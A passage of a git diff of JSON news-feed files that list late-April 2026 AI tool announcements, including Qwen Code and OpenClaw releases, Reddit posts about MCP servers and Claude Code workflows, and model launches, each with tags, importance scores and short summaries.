no API keys, no unofficial sources", - "url": "https://reddit.com/r/ClaudeAI/comments/1sx2u3s/built_an_mcp_connector_for_official_python_docs/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.8600000000000001, - "date": "2026-04-27T12:54:43.000Z", - "summary": "I built an MCP server for Python stdlib docs with one goal: make it easy to defend in a company environment.\n\n[https://github.com/ayhammouda/python-docs-mcp-server](https://github.com/ayhammouda/python-docs-mcp-server)\n\nThe core idea is simple. Instead of going through third-party APIs or unofficial doc sources, it connects MCP clients to the official Python docs.\n\nI built it because this is where good tooling usually gets stuck. In a solo setup, everything looks fine. In a company, security and", - "category": "ai_tools" - }, - { - "title": "OpenClaw v2026.4.25 released", - "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.4.25", - "source": "GitHub Releases · OpenClaw", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.78, - "date": "2026-04-27T12:45:30.000Z", - "summary": "## 2026.4.25\n\n### Highlights\n\n- Voice replies get a full TTS upgrade: `/tts latest`, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. 
Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, @xuruiray, @itsuzef, and @barronlroth.\n- Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discov", - "category": "ai_tools" - }, - { - "title": "Built a open-source local music video generator using SDXL + AnimateDiff + audio-reactive GLSL shaders", - "url": "https://reddit.com/r/StableDiffusion/comments/1swx934/built_a_opensource_local_music_video_generator/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-27T08:04:41.000Z", - "summary": "I needed visuals for AI-generated tracks, so I built Glitchframe, a pipeline that takes an audio file and produces a full music video using SDXL keyframe stills or AnimateDiff motion, with GLSL shaders that react to beat/onset/spectrum data in real time.\n\nStack: SDXL for backgrounds, optional AnimateDiff (fair warning: \\~20 GB VRAM), Skia for kinetic typography, WhisperX for word-level lyric sync, FFmpeg NVENC for encode. 
UI runs in Gradio locally.\n\nAnimateDiff integration was the most painful p", - "category": "creative_tools" - }, - { - "title": "PixlStash 1.1.0 is now available!", - "url": "https://reddit.com/r/StableDiffusion/comments/1sx8khw/pixlstash_110_is_now_available/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 0.7, - "date": "2026-04-27T16:21:39.000Z", - "summary": "[PixlStash](https://pixlstash.dev) is a locally hosted, open source, picture management server for organising, filtering, tagging and reviewing large image collections.\n\nThe main target for version 1.1.0 was to support existing self-organised reference folders, so you can index, tag and include pictures from folders you've carefully organised yourself. But there are some more features as well:\n\n* Automatic import folders in the UI along with the reference folders\n* Statistics sidebar that shows ", - "category": "creative_tools" - }, - { - "title": "Is anyone working on a ComfyUI node for the new Ideogram LoRA API? (They call it Custom Model)", - "url": "https://reddit.com/r/StableDiffusion/comments/1sxh6ir/is_anyone_working_on_a_comfyui_node_for_the_new/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.62, - "date": "2026-04-27T21:21:20.000Z", - "summary": "I've been playing around with the new Ideogram LoRA training feature just to test it out. I trained a LoRA on the [Loomies illustration library](https://getillustrations.com/illustration-pack/loomies-free-vector-illustrations), and the way it gets all the details right and handles text generation is honestly flawless. 😀\n\nBut, I do 99% of my actual work locally and hate leaving my node setups. Has anyone seen (or started building) a custom node to pull their API into ComfyUI yet? 
I'd love to be ", - "category": "creative_tools" - }, - { - "title": "NVIDIA Sonic Makes Humanoid Robots Cheap — Open Source Forever", - "url": "https://x.com/JoseCSancho/status/2048587841882439784", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-27T15:59:13.833Z", - "summary": "Braygent's take: NVIDIA Sonic is the moment humanoid robotics becomes accessible to startups. The economics changed permanently today.", - "category": "ai_tools" - }, - { - "title": "NVIDIA Kimodo — Motion Diffusion for Humanoid Robots Trained on 700 Hours of Mocap", - "url": "https://x.com/AIKumarvels/status/2048294442063970777", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-27T15:59:13.833Z", - "summary": "Braygent's take: NVIDIA Kimodo plus Sonic gives humanoid developers a complete open source motion stack. NVIDIA is winning the physical AI era the same way it won LLM compute.", - "category": "ai_tools" - }, - { - "title": "OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 fig…", - "url": "https://x.com/News_pulse360/status/2048733780744278450", - "source": "X / @news_pulse360", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-27T11:59:31.000Z", - "summary": "OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. 
The model is built for agentic tasks and ease of use: GPT-5.5 figures out what you're trying to do", - "category": "ai_tools" - }, - { - "title": "OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. h…", - "url": "https://x.com/AlternativeTo/status/2048666474181808532", - "source": "X / @alternativeto", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-27T07:32:04.000Z", - "summary": "OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. https:// alternativeto.net/news/2026/4/op enai-releases-privacy-filter-a-local-open-weight-model-built-for-personal-data-masking/ …", - "category": "ai_tools" - }, - { - "title": "two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the…", - "url": "https://x.com/witcheer/status/2048665173326532861", - "source": "X / @witcheer", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-27T07:26:54.000Z", - "summary": "two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the same day. 
V4-Pro at $1.74/$3.48,", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-28.json b/data/news-feed-2026-04-28.json deleted file mode 100644 index bb29a10..0000000 --- a/data/news-feed-2026-04-28.json +++ /dev/null @@ -1,269 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.618Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-28", - "article_count": 15, - "archived_story_count": 683, - "articles": [ - { - "title": "Hermes Agent v0.11.0 — 700 Pull Requests from 200 Contributors", - "url": "https://x.com/NousResearch/status/2047518675163636112", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "developer_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-28T04:29:26.993Z", - "summary": "Hermes Agent v0.11.0 launched with 700+ pull requests from 200+ contributors, demonstrating the scale of open source AI agent development. 
The release is the largest update to the framework to date.", - "category": "ai_tools" - }, - { - "title": "Qwen Code sdk-typescript-v0.1.7 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/sdk-typescript-v0.1.7", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "api_update", - "github_release", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "github_release", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-28T06:16:45.000Z", - "summary": "## Bundled CLI Version\n\nThis SDK release bundles CLI version: 0.15.3\n\nSource: latest stable CLI from npm\n\n---\n\n## Bundled CLI Version\n\nThis SDK release bundles CLI version: 0.13.1\n\nSource: latest stable CLI from npm\n\n---\n\n> Backfilled release for npm-published version 0.1.5 (original workflow failed before GitHub release creation).\r\n\r\n## What's Changed\r\n* chore: bump version to 0.8.2 by @Mingholy in https://github.com/QwenLM/qwen-code/pull/1632\r\n* chore(release): sdk-typescript v0.1.4 by @qwen-c", - "category": "ai_tools" - }, - { - "title": "Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring…", - "url": "https://x.com/CrowdStrike/status/2049179351837512138", - "source": "X / @crowdstrike", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-28T17:30:04.000Z", - "summary": "Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring. 
Track administrative changes, tool", - "category": "ai_tools" - }, - { - "title": "Gemini Launches Agentic Trading on a Regulated US Exchange", - "url": "https://x.com/xHub_AI/status/2049131460460745232", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-28T17:27:14.508Z", - "summary": "Braygent wants to post about Gemini's Agentic Trading as the first regulated US exchange to enable AI model integration for live trading, arguing it changes what AI agents are allowed to do in the real world.", - "category": "ai_tools" - }, - { - "title": "NVIDIA Ships One Model That Replaces Vision Speech and Text Chain", - "url": "https://x.com/benitoz/status/2049168050495053924", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-28T17:27:14.508Z", - "summary": "Braygent wants to post about NVIDIA Nemotron 3 Nano Omni as a genuinely important release that unifies vision, speech, and text in one model, enabling 9x more agents per GPU with open weights.", - "category": "ai_tools" - }, - { - "title": "Warp Terminal Goes Open Source", - "url": "https://x.com/zeddotdev/status/2049167033275728343", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-28T17:27:14.507Z", - "summary": "Braygent wants to post about Warp going open source, arguing it signals the maturation of the AI developer tools market and the continued victory of open source in AI infrastructure.", - "category": "ai_tools" - }, - { - "title": "NEWS: AWS and OpenAI officially announce their partnership. 
Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI", - "url": "https://x.com/ainews_24_7/status/2049178579510956193", - "source": "X / @ainews_24_7", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-28T17:26:59.000Z", - "summary": "NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI", - "category": "ai_tools" - }, - { - "title": "NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.", - "url": "https://x.com/earlyn_ai/status/2049176023724359681", - "source": "X / @earlyn_ai", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-28T17:16:50.000Z", - "summary": "NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.", - "category": "ai_tools" - }, - { - "title": "shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.", - "url": "https://x.com/DevLsx/status/2049019913465979131", - "source": "X / @devlsx", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-28T06:56:30.000Z", - "summary": "shipping claude-manager today. 
it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.", - "category": "ai_tools" - }, - { - "title": "I built a framework for running AI teammates in your Slack, operated entirely from inside Claude Code", - "url": "https://reddit.com/r/ClaudeAI/comments/1sxy6og/i_built_a_framework_for_running_ai_teammates_in/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-28T11:06:30.000Z", - "summary": "I run a small smart-home company called Ginnie (hence the name). There's always more work than hands. Investigations to run, dashboards to scan, follow-ups to chase. I wanted more hands. Real teammates, not chatbots, not function-calling demos.\n\nSo I built ginnie-agents and ran my own team on it for months. Open-sourcing it now.\n\nWhat it is: a framework for a team of autonomous AI agents in your Slack workspace. 
Each agent has:\n\n\\- Its own Slack identity, app, avatar, channel\n\n\\- Persistent thre", - "category": "ai_tools" - }, - { - "title": "Qwen Code v0.15.4 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.4", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.78, - "date": "2026-04-28T13:22:30.000Z", - "summary": "## What's Changed\n* feat: Adds Catalan language support by @jordimas in https://github.com/QwenLM/qwen-code/pull/3643\n* fix(vscode-companion): slash command completion not triggering after message submit by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3609\n* fix(cli): guard gradient rendering without colors by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3640\n* fix(config): support QWEN_CODE_API_TIMEOUT_MS across OAuth and non-OAuth paths by @B-A-M-N in https://github.com/Q", - "category": "ai_tools" - }, - { - "title": "Open source package with 1 million monthly downloads stole user credentials", - "url": "https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/", - "source": "Ars Technica AI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.74, - "date": "2026-04-28T06:01:02.337Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Your Claude Code project dashboard is now on the Mac App Store", - "url": "https://reddit.com/r/ClaudeAI/comments/1syfl97/your_claude_code_project_dashboard_is_now_on_the/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-04-28T21:56:14.000Z", - "summary": "Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. 
\n\n\nApp Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691)\n\n\n\nQuick recap if you missed the original. \nStorybloq is a project tracker that lives in `.story/` inside your repo. \n \nTickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server ex", - "category": "ai_tools" - }, - { - "title": "ComfyUI Raises $30M at $500M Valuation", - "url": "https://x.com/robertnishihara/status/2047772168147374085", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-28T17:27:14.508Z", - "summary": "Braygent wants to post about ComfyUI's $30M raise at $500M valuation as a signal about the business model for open source AI tools with large developer communities.", - "category": "ai_tools" - }, - { - "title": "Scoble on One AI Doing Everything: The Everything App Is Coming", - "url": "https://x.com/Scobleizer/status/2048690528653660399", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-28T17:27:13.257Z", - "summary": "Robert posted that one AI will do everything and the OS itself should be rebuilt by AI for AI to use, with the everything app coming as a result. 
The vision is more radical than most industry commentary about AI integration.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-29.json b/data/news-feed-2026-04-29.json deleted file mode 100644 index 55e369f..0000000 --- a/data/news-feed-2026-04-29.json +++ /dev/null @@ -1,265 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.824Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-29", - "article_count": 15, - "archived_story_count": 700, - "articles": [ - { - "title": "Vercel CLI @vercel/python-workers@0.0.19 released", - "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.19", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-04-29T20:39:18.000Z", - "summary": "### Patch Changes\n\n- b357f9d: Align queue deployment pinning with the TypeScript SDK by distinguishing automatic pinning, explicit deployment IDs, and explicit unpinned sends.\n- fddd88c: [vercel-workers] payload type validation\n- fb68ac6: Add explicit Python queue worker retry and acknowledgement directives. 
Workers can now return or raise `RetryAfter` and `Ack` to control retry and acknowledgement behavior.\n", - "category": "ai_tools" - }, - { - "title": "Converting Claude Code into the most intelligent Deep Research Agent", - "url": "https://reddit.com/r/ClaudeAI/comments/1sz9ib0/converting_claude_code_into_the_most_intelligent/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-29T19:47:38.000Z", - "summary": "Over the past several weeks, I've been working on HyperResearch, a Claude Code skill harness that converts CC into the most intelligent deep research framework out there.\n\nHyperResearch surpasses OpenAI, Google, and NVIDIA's offerings in the agentic search space based on DeepResearch Bench. It's open-source, installable with a single command, and uses your CC subscription, so you don't have to pay for OpenAI or Gemini Pro.\n\nIt uses a 16-step pipeline that creates a searchable, persistent knowled", - "category": "ai_tools" - }, - { - "title": "Higgsfield MCP Is Now Inside OpenClaw, Hermes Agent, and NemoClaw", - "url": "https://x.com/Maginative/status/2049200033665569020", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-04-29T14:44:20.783Z", - "summary": "Higgsfield MCP launched inside OpenClaw, Hermes Agent, and NemoClaw, enabling end-to-end content creation including video generation within a single agent session.", - "category": "ai_tools" - }, - { - "title": "AAIF Announces AGNTCon and MCPCon EU and NA for 2026", - "url": "https://x.com/AgenticAIFdn/status/2039696612633571565", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "product_launch" - ], - "matching_tags": [ - "mcp", - "product_launch" - ], - "importance": 1, - "date": "2026-04-29T14:41:24.682Z", - "summary": "The Agentic AI 
Foundation announced its 2026 events lineup including AGNTCon and MCPCon in EU and NA, plus global MCP Dev Summits for agentic AI builders.", - "category": "ai_tools" - }, - { - "title": "Poolside AI Just Released Its First Public Models: Open Source and API", - "url": "https://x.com/marah_i_abdin/status/2049161468017287490", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-29T01:48:00.432Z", - "summary": "Braygent's take: Poolside's first public models are a significant stealth-to-public moment. The open-source Laguna XS.2 gives the community access to a serious coding-focused MoE model.", - "category": "ai_tools" - }, - { - "title": "Qwen Code v0.15.5 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.5", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-29T09:54:18.000Z", - "summary": "## What's Changed\n* mcp config as cli by @eliird in https://github.com/QwenLM/qwen-code/pull/1279\n* fix(cli): refresh static header on model switch by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3667\n* feat(core): wire background shells into the task_stop tool by @wenshao in https://github.com/QwenLM/qwen-code/pull/3687\n* feat(skills): add tmux-real-user-testing skill for readable TUI test logs by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3577\n* feat(cli): wire backgrou", - "category": "ai_tools" - }, - { - "title": "The final nail in the coffin for entry level creative freelancers just dropped", - "url": "https://reddit.com/r/ClaudeAI/comments/1syu949/the_final_nail_in_the_coffin_for_entry_level/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.94, - "date": 
"2026-04-29T09:55:19.000Z", - "summary": "Anthropic just officially released the blender mcp connector today alongside adobe ,splice and sketchup, you can now type \"create a low poly beach scene with palm trees and sunset lighting\" into claude and watch it build the entire thing in blender in real time tadaaa. They even became an official blender development fund patron\n\nThis is claude directly controlling blender through the python api which means it can modify existing scenes, debug your node setups, batch apply changes across objects", - "category": "ai_tools" - }, - { - "title": "Launched My First App Using Claude", - "url": "https://reddit.com/r/ClaudeAI/comments/1sz38u6/launched_my_first_app_using_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-29T16:07:47.000Z", - "summary": "Hello everyone. About a week ago, I was able to launch my very own app, all of it being built by Claude.\n\nIt’s a vehicle management app. Allows you to keep track of how much you’re spending on your car(s), comes with a built in maintenance schedule that’s customizable, fuel tracking system, a showroom mode for people who would like to showcase their vehicles, and an AI assistant (Claude API).\n\nIt’s all front end, and everything is stored locally on the users device. The API calls do require a da", - "category": "ai_tools" - }, - { - "title": "Claude Design is amazing but I keep hitting rate limits. 
Tested an open source skill that runs on your normal subscription limits — here's both outputs for you to judge.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sz1rca/claude_design_is_amazing_but_i_keep_hitting_rate/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 0.78, - "date": "2026-04-29T15:15:33.000Z", - "summary": "Claude design is genuinely great for building HTML layouts and presentations. the problem is it burns through your usage fast — i was hitting limits after a few iterations.\n\nFound an open source claude code skill called huashu-design that does the same kind of thing (HTML prototypes, slide decks, animations) but runs through your normal claude code subscription. no separate rate limit.\n\n\n\nWanted to see how they actually compare, so i gave both the exact same prompt. one shot each, no follow-up e", - "category": "ai_tools" - }, - { - "title": "Fully 3D-modeled Raspberry Pi 5 enclosure made 100% through Claude's Blender MCP, zero manual modeling", - "url": "https://reddit.com/r/ClaudeAI/comments/1sz748q/fully_3dmodeled_raspberry_pi_5_enclosure_made_100/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-29T18:23:09.000Z", - "summary": "So I've been experimenting with Claude's new Blender MCP integration and decided to push it to its limits with a real engineering project: a complete, print-ready enclosure for the Raspberry Pi 5, modeled entirely through AI prompts, no hands on keyboard in Blender at all.\n\n**What Claude did autonomously:**\n\n* Researched and confirmed the official Raspberry Pi 5 mechanical dimensions from the datasheet (85×56mm PCB, exact mounting hole positions at 3.5/61.5 × 3.5/52.5mm)\n* Mapped every port and ", - "category": "ai_tools" - }, - { - "title": "Pattern I'm using to keep Claude Code 
productive on overnight unattended runs", - "url": "https://reddit.com/r/ClaudeAI/comments/1syr2pt/pattern_im_using_to_keep_claude_code_productive/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-04-29T06:51:16.000Z", - "summary": "Been running Claude Code on multi-hour autonomous sessions for a few months and kept hitting the same wall: the longer it runs, the worse the work gets. Not a context-window problem (1M handles that fine), but a feedback-loop problem. Iteration N+10 makes the same mistakes it made at iteration N, because nothing updates between iterations except the code.\n\nBuilt a small framework around three pieces that, between them, solved it for me. Together this framework as enabled me to consistently run v", - "category": "ai_tools" - }, - { - "title": "Your Claude Code project dashboard is now on the Mac App Store", - "url": "https://reddit.com/r/ClaudeAI/comments/1symv0c/your_claude_code_project_dashboard_is_now_on_the/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-04-29T03:13:42.000Z", - "summary": "Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free.\n\nApp Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691)\n\nQuick recap if you missed the original. \nStorybloq is a project tracker that lives in `.story/` inside your repo.\n\nTickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. 
The CLI and MCP server expose it to ", - "category": "ai_tools" - }, - { - "title": "LosslessCut v3.68.0 released", - "url": "https://github.com/mifi/lossless-cut/releases/tag/v3.68.0", - "source": "GitHub Releases · LosslessCut", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.7, - "date": "2026-01-29T16:54:17.000Z", - "summary": "⚠️ **Warning:** The keyboard handling has changed as of v3.67.0 and later. If you after upgrading to this version ever revert to a version prior to v3.67.0, you **will lose your keyboard bindings**. Also there's an issue with migrating certain shortcuts with some keyboard layouts to the new version. See [TLDR here.](https://github.com/mifi/lossless-cut/issues/2671#issuecomment-3727638311)\r\n\r\nNote: there's a bug with the [app size of this version being larger](https://github.com/mifi/lossless-cut", - "category": "ai_tools" - }, - { - "title": "I built a Kanban board for Claude Code so I can run agent sessions straight from cards", - "url": "https://reddit.com/r/ClaudeAI/comments/1sye8bs/i_built_a_kanban_board_for_claude_code_so_i_can/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.54, - "date": "2026-04-28T21:04:05.000Z", - "summary": "I've been running 4-5 Claude Code sessions in parallel and kept losing track - which terminal had the auth work, which one was the bug fix, what's actually done.\n\nSo I added a Kanban board to **Vibeyard** (an open-source IDE I'm building for Claude Code). \n\nEach card is a task. Click run → it spins up a Claude session scoped to that task. 
When Claude finishes, the card moves itself to Done.\n\nIt turned Claude from \"a terminal I talk to\" into ", - "category": "ai_tools" - }, - { - "title": "Are we underweighting execution benchmarks when we talk about open-source frontier models?", - "url": "https://reddit.com/r/StableDiffusion/comments/1szb07b/are_we_underweighting_execution_benchmarks_when/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-29T20:41:38.000Z", - "summary": "A lot of open-source model discussion still centers on broad IQ-style evals or raw one-turn quality. What feels underdiscussed to me is whether execution-heavy evaluation is becoming its own frontier.\n\n\n\nLing-2.6-1T being open-sourced on Hugging Face today is one reason I’m thinking about this. Its stated profile is unusually explicit: precise instruct execution, strong results on execution-heavy / agentic tasks, low token overhead, and long-context task handling.\n\n\n\nIf more frontier open models", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-30.json b/data/news-feed-2026-04-30.json deleted file mode 100644 index b7d0e4d..0000000 --- a/data/news-feed-2026-04-30.json +++ /dev/null @@ -1,255 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.990Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-30", - "article_count": 15, - "archived_story_count": 692, - "articles": [ - { - "title": "[Open Source] We built a local code search MCP for Claude Code that uses ~98% fewer tokens than grep+read", - "url": "https://reddit.com/r/ClaudeAI/comments/1szvo7t/open_source_we_built_a_local_code_search_mcp_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-30T13:11:07.000Z", - "summary": 
"Working on large codebases with Claude Code, we kept running into the same issue: when Claude looks for relevant code, it falls back to grep, reading full files, or launching multiple subagents. This burns through tokens, and often misses the relevant code. There are some existing solutions (that we also benchmarked against), but they all had issues (too slow, needs API keys, quality not good enough, etc).\n\nWe built [Semble](https://github.com/MinishLab/semble) to fix this. It's a local MCP serv", - "category": "ai_tools" - }, - { - "title": "The \"Big Tech Steamroller\" is coming for your AI agent. Before you write another line of code, ask yourself: \"Can a trillion-dollar company do this with a single API update?\" If the answer is yes, pivot now.", - "url": "https://x.com/AI_BioPhD/status/2049769860897321027", - "source": "X / @ai_biophd", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-30T08:36:32.000Z", - "summary": "The \"Big Tech Steamroller\" is coming for your AI agent. Before you write another line of code, ask yourself: \"Can a trillion-dollar company do this with a single API update?\" If the answer is yes, pivot now.", - "category": "ai_tools" - }, - { - "title": "Cursor SDK — The Democratization of Agent Development", - "url": "https://x.com/Marktechpost/status/2049711306643759265", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - 